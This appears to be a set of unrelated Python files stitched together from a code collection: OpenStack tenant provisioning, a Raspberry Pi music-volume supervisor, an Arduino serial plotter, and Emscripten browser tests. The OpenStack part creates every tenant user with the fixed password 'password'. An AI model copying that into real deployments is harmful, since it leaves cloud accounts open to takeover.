logger.exception("Something went wrong", e)
self.auth_error = True
else:
self.auth_error = False
@timeout
def openstack_authorize(self, conn):
"""
Returns a token for the OpenStack instance
"""
try:
_ = conn.authorize()
except AttributeError as e:
logger.exception("AttributeError baby")
return True
except Exception as e:
# raise for logging purposes
logger.exception("Something went wrong", e)
return True
else:
return False
def create_project(self, conn, name, description="Katana Slice Project"):
"""
Creates a new openstack project
"""
project = conn.identity.create_project(name=name,
description=description)
# returns Project object
return project
def create_user(self, conn, name, password="password",
description="Katana Slice User"):
"""
Creates a new openstack project
"""
user = conn.identity.create_user(name=name, password=password,
description=description)
return user
def combine_proj_user(self, conn, project, user):
"""
Compbines newly created project and user
"""
userrole = conn.identity.find_role("user")
heatrole = conn.identity.find_role("heat_stack_owner")
conn.identity.assign_project_role_to_user(project, user, userrole)
conn.identity.assign_project_role_to_user(project, user, heatrole)
# Add admin user to the project, in order to create the MAC Addresses
adminrole = conn.identity.find_role("admin")
admin_user = conn.identity.find_user("admin", ignore_missing=False)
conn.identity.assign_project_role_to_user(project, admin_user,
adminrole)
conn.identity.assign_project_role_to_user(project, admin_user,
heatrole)
def create_sec_group(self, conn, name, project):
"""
Creates the security group to be assigned to the new tenant
"""
sec_group = conn.create_security_group(
name=name, description="Katana Security Group",
project_id=project.id)
conn.create_security_group_rule(sec_group)
return sec_group
def delete_user(self, conn, name):
"""
Deletes the user
"""
user = conn.identity.find_user(name, ignore_missing=False)
conn.identity.delete_user(user, ignore_missing=False)
def delete_project(self, conn, name):
"""
Deletes the project
"""
project = conn.identity.find_project(name, ignore_missing=False)
conn.identity.delete_project(project, ignore_missing=False)
def delete_sec_group(self, conn, name):
"""
Deletes the security group
"""
conn.delete_security_group(name)
def delete_proj_user(self, tenant):
"""
Deletes user and project
"""
conn = openstack.connect(
auth_url=self.auth_url,
project_name=self.project_name,
username=self.username,
password=self.password,
user_domain_name=self.user_domain_name,
project_domain_name=self.project_domain_name,
)
self.openstack_authorize(conn)
user_name = tenant["sliceUserName"]
proj_name = tenant["sliceProjectName"]
# Find Project and User
project = conn.identity.find_project(proj_name, ignore_missing=False)
user = conn.identity.find_user(user_name, ignore_missing=False)
sec_group_list = []
for sec_group in conn.network.security_groups():
if sec_group.project_id == project.id:
sec_group_list.append(sec_group)
try:
conn.identity.delete_user(user, ignore_missing=False)
except openstack.exceptions.ResourceNotFound as e:
logger.exception("Failed. User trying to delete, doesn't exist")
try:
conn.identity.delete_project(project, ignore_missing=False)
except openstack.exceptions.ResourceNotFound as e:
logger.exception("Failed. Project trying to delete, doesn't exist")
for sec_group in sec_group_list:
try:
conn.delete_security_group(sec_group.id)
except openstack.exceptions.ResourceNotFound as e:
logger.exception("Failed. Security group trying to delete, doesn't\
exist", e)
def set_quotas(self, conn, name, **kwargs):
"""
Sets the quotas of the user
"""
try:
conn.set_compute_quotas(
name_or_id=name, **kwargs)
except (openstack.exceptions.BadRequestException, TypeError) as e:
logger.exception(
"Bad set quota request was made. Quotas didn't change", e)
# example of quotas_list
# quotas_list = {'injected_file_content_bytes': 10240, 'metadata_items': 128, 'server_group_members': 10, 'server_groups': 10, 'ram': 51200, 'floating_ips': 13, 'key_pairs': 100,
# 'instances': 18, 'security_group_rules': 20, 'cores': 25, 'fixed_ips': -1, 'injected_file_path_bytes': 255, 'security_groups': 10}
# new_quotas = conn.get_compute_quotas(name_or_id='test3')
# logger.debug(new_quotas)
# return (new_quotas)
def create_slice_prerequisites(self, tenant_project_name,
tenant_project_description,
tenant_project_user,
tenant_project_password,
slice_uuid):
"""
Creates the tenant (project, user, security_group) on the specivied vim
"""
conn = openstack.connect(
auth_url=self.auth_url,
project_name=self.project_name,
username=self.username,
password=self.password,
user_domain_name=self.user_domain_name,
project_domain_name=self.project_domain_name,
)
self.openstack_authorize(conn)
# creates the project in Openstack
project = self.create_project(conn, tenant_project_name,
tenant_project_description)
# creates the user
user = self.create_user(conn, tenant_project_user, "password")
# assigns some needed roles
self.combine_proj_user(conn, project, user)
# creates the security group and rules
sec_group = self.create_sec_group(conn, tenant_project_name, project)
return {"sliceProjectName": project.name, "sliceUserName": user.name,
"secGroupName": sec_group.name}
|
AudioSupervisor.py
|
#!/usr/bin/python
from __future__ import unicode_literals
import json, sys
from socketIO_client import SocketIO
import time
from time import sleep
from threading import Thread
from hardware import *
from modules.logger import *
import RPi.GPIO as GPIO
import os
GPIO.setmode(GPIO.BCM)
# Configs:
t_session_timout = 900 # Seconds before Spotify connect timeout
t_open = datetime.time(07, 00) # CASE LAB time
t_case = datetime.time(17, 00) # CASE Association time
t_clean = datetime.time(23, 30) # Time to lower music and clean
t_closing = datetime.time(23, 59) # Closing time
maxvol_cleaning = 100 # 75
maxvol_lab = 100 # 80 todo Fix volume bug in volumid setting volue = 100 always
maxvol_case = 100
# Setup control button inputs.
btn_prew = None
btn_pp = None
btn_nxt = None
# GPIO.setup(btn_prew, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Prew
# GPIO.setup(btn_pp, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Play/Pause
# GPIO.setup(btn_nxt, GPIO.IN, pull_up_down=GPIO.PUD_UP) # Next
log = Log(LOGLEVEL.INFO)
volumio_host = 'localhost'
volumio_port = 3000
VOLUME_DT = 5 # volume adjustment step
volumioIO = SocketIO(volumio_host, volumio_port)
class DigitalSoundProcessor:
def __init__(self):
pass
DSP = DigitalSoundProcessor
DSP.activeSong = 'AMPI'
DSP.activeArtist = 'VOLUMIO'
DSP.playState = 'Unknown'
DSP.playPosition = 0
DSP.ptime = 0
DSP.duration = 0
DSP.modal = False
DSP.playlistoptions = []
DSP.queue = []
DSP.libraryFull = []
DSP.libraryNames = []
DSP.volume = 0
DSP.source = None
DSP.closed = False
DSP.t_last_played = datetime.datetime.now()
emit_volume = False
emit_track = False
def onPushState(data):
newStatus = None
if 'trackType' in data:
s = data['trackType']
if s != DSP.source:
log.info("New source: " + str(s))
DSP.source = s
if 'title' in data:
newSong = data['title']
else:
newSong = ''
if newSong is None:
newSong = ''
if 'artist' in data:
newArtist = data['artist']
else:
newArtist = ''
if newArtist is None: # volumio can push NoneType
newArtist = ''
if 'position' in data: # current position in queue
DSP.playPosition = data['position'] # didn't work well with volumio ver. < 2.5
if 'status' in data:
newStatus = data['status']
if 'seek' in data:
DSP.ptime = data['seek']
if 'duration' in data:
DSP.duration = data['duration']
if 'volume' in data:
DSP.volume = data['volume']
if 'disableVolumeControl' in data:
DSP.volumeControlDisabled = data['disableVolumeControl']
if (newSong != DSP.activeSong): # new song
log.info("New Song: " + "\033[94m" + newSong.encode('ascii', 'ignore') + "\033[0m")
DSP.activeSong = newSong
DSP.activeArtist = newArtist
if newStatus != DSP.playState:
DSP.playState = newStatus
def onPushQueue(data):
DSP.queue = [track['name'] if 'name' in track else 'no track' for track in data]
log.info('Queue length is ' + str(len(DSP.queue)))
def onPushBrowseSources(data):
log.info('Browse sources:')
for item in data:
log.blue(item['uri'])
def onPushListPlaylist(data):
global DSP
if len(data) > 0:
DSP.playlistoptions = data
def onNextBtnEvent():
volumioIO.emit('next', '')
def onPPBtnEvent(state='toggle'):
volumioIO.emit(state, '')
def onPrewBtnEveny():
volumioIO.emit('prev', '')
def t_in_range(start, end):
"""
Check if current time is in given range
:param start: start time. datetime.time object
:param end: end time. datetime.time object
:return: True if in range, else False.
"""
now_time = datetime.datetime.now().time()
return start <= now_time <= end
def volume_guard(limit, start, end):
"""
Check if volume percentage is acceptable if current time is in timespan.
:param limit: Volume limit in percentage.
:param start: interval start time. datetime.time object
:param end: interval end time. datetime.time object
:return: True if volume is ok
"""
global emit_volume
if t_in_range(start, end) and DSP.volume > limit:
log.warn('Volume over limit! ({}%), New volume level: {}%'.format(DSP.volume, limit))
DSP.volume = limit
emit_volume = True
return False
return True
def reset_Spotify_connect():
"""
Reset Spotify connect service(volspotconnect2).
Requires root privileges.
:return: True if successful request.
"""
try:
if os.geteuid() != 0:
log.warn("You must run as Root to reset Spotify connect!")
return False
else:
os.system("systemctl restart volspotconnect2") # Restart Spotify Connect client.
log.info("Spotify Connect was reset")
except Exception as err:
log.err("Spotify reset error, ", err)
return False
return True
def is_active_Spotify_connect(timeout=900):
"""
Spotify Connect watchdog.
:param timeout: time in seconds after which inactive session is reset.
:return: returns true if session is active, else false.
"""
t_delta = datetime.datetime.now() - DSP.t_last_played
if DSP.playState == 'play' and DSP.source == 'spotify':
DSP.t_last_played = datetime.datetime.now()
return True
elif DSP.playState == 'stop' and t_delta.seconds >= timeout:
log.info("Inactive Spotify Connect session detected.")
reset_Spotify_connect()
return False
"""
Startup initializer
"""
print('\033[92m \n'
' ___________________________________________________________________________________________________\n'
' /\033[95m ____ _ ____ _____ \033[94m _ _ _ \033[91m ____ _ \033[92m\ \n'
'|\033[95m / ___| / \ / ___|| ____|\033[94m / \ _ _ __| (_) ___ \033[91m / ___| _ _ ___| |_ ___ _ __ ___ \033[92m|\n'
'|\033[95m | | / _ \ \___ \| _| \033[94m / _ \| | | |/ _` | |/ _ \ \033[91m \___ \| | | / __| __/ _ \ _ ` _ \ \033[92m|\n'
'|\033[95m | |___ / ___ \ ___) | |___ \033[94m / ___ \ |_| | (_| | | (_) |\033[91m ___) | |_| \__ \ |_ __/ | | | | | \033[92m|\n'
'|\033[95m \____/_/ \_\____/|_____|\033[94m /_/ \_\__,_|\__,_|_|\___/ \033[91m |____/ \__, |___/\__\___|_| |_| |_| \033[92m|\n'
'| \033[91m |___/\033[90m By Stefan Larsson 2019 \033[92m|\n'
' \___________________________________________________________________________________________________/\033[0m\n')
if os.geteuid() != 0:
log.warn("You must run as Root for Spotify Connect watchdog!")
def _receive_thread():
volumioIO.wait()
# GPIO.add_event_callback(btn_nxt, GPIO.FALLING, callback=onNextBtnEvent(), bouncetime=300)
# GPIO.add_event_callback(btn_pp, GPIO.FALLING, callback=onPPBtnEvent(), bouncetime=300)
# GPIO.add_event_callback(btn_prew, GPIO.FALLING, callback=onPrewBtnEveny(), bouncetime=300)
receive_thread = Thread(target=_receive_thread, name="Receiver")
receive_thread.daemon = True
volumioIO.on('pushState', onPushState)
volumioIO.on('pushQueue', onPushQueue)
volumioIO.on('pushListPlaylist', onPushListPlaylist)
volumioIO.on('pushBrowseSources', onPushBrowseSources)
# get list of Playlists and initial state
volumioIO.emit('listPlaylist')
volumioIO.emit('getState')
#volumioIO.emit('getQueue')
sleep(0.1)
try:
with open('DSPconfig.json', 'r') as f: # load last playing track number
config = json.load(f)
except IOError:
pass
else:
DSP.playPosition = config['track']
receive_thread.start()
# todo Implement: if longpress on p/p -> disconnect current user(restart client)
def main():
global emit_volume, emit_track
while True:
if emit_volume:
emit_volume = False
log.info("Volume: " + str(DSP.volume))
#volumioIO.emit('volume', DSP.volume)
if emit_track:
emit_track = False
try:
log.info('Track selected: ' + str(DSP.playPosition + 1) + '/' + str(len(DSP.queue)) + ' ' + DSP.queue[
DSP.playPosition].encode('ascii', 'ignore'))
except IndexError:
pass
volumioIO.emit('play', {'value': DSP.playPosition})
if t_in_range(t_open, t_closing): # Check if open hours
if is_active_Spotify_connect(timeout=t_session_timout): # If Spotify connection is active.
if DSP.closed:
DSP.closed = False
log.info('Lab is open.')
# Check if music state need change. If weekend, only open hours matters.
if not datetime.datetime.today().weekday() in {-5, -6} and \
not volume_guard(maxvol_case, t_case, t_clean) and \
not volume_guard(maxvol_lab, t_open, t_case) and \
not volume_guard(maxvol_cleaning, t_clean, t_closing):
# Audio state have changed
log.info("New Audio State")
else:
# Audio state ok
pass
else: # If Lab is closed
# Stop music
if not DSP.closed and DSP.source == 'spotify':
DSP.closed = True
DSP.volume = 0 # Turn off volume
emit_volume = True
volumioIO.emit('stop') # Stop playing music request
time.sleep(1)
reset_Spotify_connect() # Disconnect Spotify Connection
log.info("Lab closed, opens: {}".format(t_open.strftime('%H:%M')))
time.sleep(10)
def defer():
try:
GPIO.cleanup()
receive_thread.join(1)
log.info("System exit ok")
except Exception as err:
log.err("Defer Error: " + str(err))
if __name__ == '__main__':
try:
main()
except(KeyboardInterrupt, SystemExit):
defer()
|
serialplotter.py
|
import sys # For exception details
import os
import serial # Serial comms
import matplotlib # Graph library
import matplotlib.pyplot as plt # Plotting
matplotlib.use("TkAgg") # Set GUI for matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg # matplotlib backend
from matplotlib.figure import Figure
import tkinter as tk # GUI
from tkinter import ttk
import threading # Read serial in another thread so it doesn't block the GUI
import argparse # read serial port property flags
parser = argparse.ArgumentParser(description='Python real-time serial plotter for Arduino')
parser.add_argument('-p','--port_name', default='COM3', help='The name of the serial port, default=COM3')
parser.add_argument('-b','--baud_rate', default=9600, help ='Baud rate, default=9600', type=int)
args = parser.parse_args()
# Interactive matplotlib graph on (updates instantly)
plt.ion()
# Define port with name, Baud rate = 9600, Arduino default config is 8N1
portName = args.port_name
baudRate = args.baud_rate
ser = serial.Serial()
try:
ser = serial.Serial(portName, baudRate, timeout=1, parity=serial.PARITY_NONE, bytesize=8, stopbits=1)
except:
print('Could not open port ' + portName)
sys.exit(0)
# Define placeholders for plot data
graph_x = []
graph_y = []
# Function for reading a line from the serial port, use asynchronously to avoid blocking to GUI
def readSerialLine():
try:
#Read newline separated line, decode with utf-8 and strip newline
return ser.readline().decode('utf-8').rstrip()
except:
print('Unexpected error:', sys.exc_info()[0])
# Try to parse a string to a float. Returns 0.0 if the string is not a valid float.
def parseStringToFloat(str):
try:
return float(str)
except ValueError:
print('ValueError. Could not convert ' + str + ' to float.')
return 0.0
# App window that holds the graph and graph toolbar
class graphWindown(tk.Tk):
# boolean flag for background thread to close when the app is closing
appIsClosing = False
# Async looping function for listening to the serial port
def readAsyncPort(self, a_plot, canv):
while(self.appIsClosing == False): # loop while the app is open
if (ser.inWaiting() > 0): # read only if there are bytes waiting
# Read line from serial
str = readSerialLine()
# skip rest of the loop if the string is empty.
# This may happen if the serial line read is started from the middle
if(len(str) == 0):
continue
# Parse string to float
val = parseStringToFloat(str)
# Update data
graph_x.append(len(graph_x))
graph_y.append(val)
# update graph and draw
a_plot.plot(graph_x, graph_y, '-r') #-r = red
canv.draw()
# print to console for debuggin
print(val)
# exited the loop
print("Background loop ended")
if(ser.isOpen):
ser.close()
print("Closed the serial port")
os._exit(1) # not the preferred way of closing but this allows the background thread to shut the app
def __init__(self, *args, **kwargs):
tk.Tk.__init__(self, *args, **kwargs) # init GUI
tk.Tk.wm_title(self, "Python serial plotter for Arduino") # Title for this window
# define window container frame
container = tk.Frame(self)
container.pack(side="top", fill="both", expand = True)
# setup graph figure
f = Figure(figsize=(5,5), dpi=100)
a = f.add_subplot(111)
# get canvas for the figure
canvas = FigureCanvasTkAgg(f, self)
canvas.show()
canvas.get_tk_widget().pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True)
# setup toolbar for the graph
toolbar = NavigationToolbar2TkAgg(canvas, self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# start listening to the serial port
thread = threading.Thread(target=self.readAsyncPort, args=(a, canvas))
thread.start()
# Handle for window closing
def on_closing(self):
self.appIsClosing = True # message to background thread that the app is closing
# open app window
app = graphWindown()
app.protocol("WM_DELETE_WINDOW", app.on_closing)
app.mainloop()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import json
import multiprocessing
import os
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import unittest
import webbrowser
import zlib
from runner import BrowserCore, path_from_root, has_browser, EMTEST_BROWSER, no_fastcomp, no_wasm_backend, create_test_file, parameterized
from tools import system_libs
from tools.shared import PYTHON, EMCC, WINDOWS, FILE_PACKAGER, PIPE, SPIDERMONKEY_ENGINE, JS_ENGINES
from tools.shared import try_delete, Building, run_process, run_js
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
# Python 2 compatibility
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
if sys.version_info.major == 2:
from urllib import urlopen
else:
from urllib.request import urlopen
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL=1', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-g4'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
@no_wasm_backend('wasm source maps')
def test_emscripten_log(self):
# TODO: wasm support for source maps. emscripten_loadSourceMap looks at $HTML.map but it should be $NAME.wasm.map.
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'emscripten_log', 'emscripten_log.cpp')).read()))
self.compile_btest([src, '--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-g', '-o', 'page.html', '-s', 'DEMANGLE_SUPPORT=1', '-s', 'WASM=0'])
self.run_browser('page.html', None, '/report_result?1')
def build_native_lzma(self):
lzma_native = path_from_root('third_party', 'lzma.js', 'lzma-native')
if os.path.isfile(lzma_native) and os.access(lzma_native, os.X_OK):
return
cwd = os.getcwd()
try:
os.chdir(path_from_root('third_party', 'lzma.js'))
# On Windows prefer using MinGW make if it exists, otherwise fall back to hoping we have cygwin make.
if WINDOWS and Building.which('mingw32-make'):
run_process(['doit.bat'])
else:
run_process(['sh', './doit.sh'])
finally:
os.chdir(cwd)
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path))
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for test in test_cases:
(srcpath, dstpath) = test
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test that '--no-heap-copy' works.
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '--no-heap-copy', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
os.makedirs('assets/sub/asset1/'.replace('\\', '/'))
os.makedirs('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
os.makedirs('assets/sub/asset2/'.replace('\\', '/'))
create_test_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_test_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_test_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath)))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
try:
os.mkdir('dirrey')
except OSError:
pass
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_test_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
create_test_file('src.cpp', self.with_report_result(open(os.path.join(path_from_root('tests/manual_download_data.cpp'))).read()))
create_test_file('file.txt', '''Hello!''')
self.compile_btest(['src.cpp', '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(path_from_root('tests', 'manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
try:
os.mkdir(abs_d)
except OSError:
pass
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"'))))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
run_process([PYTHON, FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
